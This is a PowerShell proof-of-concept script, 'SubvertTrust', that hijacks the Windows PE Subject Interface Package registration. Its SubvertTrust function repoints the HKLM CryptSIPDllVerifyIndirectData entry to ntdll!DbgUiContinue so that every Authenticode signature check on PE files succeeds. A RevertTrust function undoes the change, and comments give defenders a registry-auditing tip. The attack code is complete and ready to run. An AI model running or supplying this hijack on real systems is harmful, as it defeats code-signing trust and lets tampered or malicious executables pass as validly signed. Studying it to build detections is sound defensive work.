Borrowing Microsoft Code Signing Certificates
<#
SubvertTrust v1.0
License: GPLv3
Author: @ConsciousHacker
Credits: @mattifestation

Proof-of-concept for the "Subverting Trust in Windows" SIP hijack: it rewrites the
registry entry that tells WinTrust which DLL/function validates a PE file's Authenticode
hash, so every PE signature check passes. Writing under HKLM normally requires an
elevated session. RevertTrust restores the registration.
#>
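function SubvertTrust
{
<#
.SYNOPSIS
Hijacks the PE Subject Interface Package (SIP) hash-validation registration so
Authenticode signature checks on PE files succeed regardless of the file's hash.

.DESCRIPTION
Repoints the CryptSIPDllVerifyIndirectData registration for the PE SIP GUID
{C689AAB8-8E78-11D0-8C47-00C04FC295EE} from WinTrust's real verifier to
ntdll!DbgUiContinue. DbgUiContinue is reused as the verifier because, per the
original author's note, it effectively returns TRUE when invoked in place of the
hash-validation function. Writing under HKLM normally requires an elevated session.
Processes already running keep the registration they loaded; start a new process
for the hijack to take effect. Use RevertTrust to restore the default.

.NOTES
Research/demo code. Defenders: the Dll/FuncName values under this key should never
change on a production host, so registry auditing on it is a high-signal detection.
On 64-bit Windows a parallel registration may exist under the WOW6432Node view
(not touched here) - confirm on the target build.
#>
    $VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
    # PE SIP GUID. Other SIP GUIDs registered under the same key (not targeted here):
    #   {C689AAB9-8E78-11D0-8C47-00C04FC295EE}
    #   {C689AABA-8E78-11D0-8C47-00C04FC295EE}
    $PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
    # -ErrorAction Stop: otherwise a missing/inaccessible key yields $null and the
    # Set-ItemProperty calls below silently do nothing.
    $PESignatureVerifier = Get-Item -Path "$VerifyHashFunc\$PESIPGuid\" -ErrorAction Stop
    # Signed-code-reuse: a legitimate, Microsoft-signed export is substituted for the
    # real verifier, so no unsigned DLL needs to be dropped on disk.
    $NewDll = 'C:\Windows\System32\ntdll.dll'
    $NewFuncName = 'DbgUiContinue'
    $PESignatureVerifier | Set-ItemProperty -Name Dll -Value $NewDll -ErrorAction Stop
    $PESignatureVerifier | Set-ItemProperty -Name FuncName -Value $NewFuncName -ErrorAction Stop
}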
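function RevertTrust
{
<#
.SYNOPSIS
Restores the default PE SIP hash-validation registration undone by SubvertTrust.

.DESCRIPTION
Points the CryptSIPDllVerifyIndirectData registration for the PE SIP GUID
{C689AAB8-8E78-11D0-8C47-00C04FC295EE} back at WINTRUST.DLL!CryptSIPVerifyIndirectData.
Writing under HKLM normally requires an elevated session. Already-running processes
keep whatever registration they loaded; start a new process for the revert to apply.

.NOTES
The restored values are hard-coded to what the original author observed as the
defaults; the exact Dll value (bare name vs. full path) can differ between Windows
builds. Export the key before running SubvertTrust, or compare against a known-good
host, rather than trusting this function to reproduce the original bytes.
#>
    $VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
    # PE SIP GUID. Other SIP GUIDs registered under the same key (not targeted here):
    #   {C689AAB9-8E78-11D0-8C47-00C04FC295EE}
    #   {C689AABA-8E78-11D0-8C47-00C04FC295EE}
    $PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
    # -ErrorAction Stop: otherwise a missing/inaccessible key yields $null and the
    # Set-ItemProperty calls below silently do nothing, leaving the hijack in place.
    $PESignatureVerifier = Get-Item -Path "$VerifyHashFunc\$PESIPGuid\" -ErrorAction Stop
    # Default WinTrust verifier (this is a restore, not an attack step).
    $NewDll = 'WINTRUST.DLL'
    $NewFuncName = 'CryptSIPVerifyIndirectData'
    $PESignatureVerifier | Set-ItemProperty -Name Dll -Value $NewDll -ErrorAction Stop
    $PESignatureVerifier | Set-ItemProperty -Name FuncName -Value $NewFuncName -ErrorAction Stop
}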
##################
# Start a new process (e.g. a fresh powershell.exe) for the hijack - or the
# revert - to take effect; processes already running keep using the SIP
# registration they loaded at startup.
# powershell
##################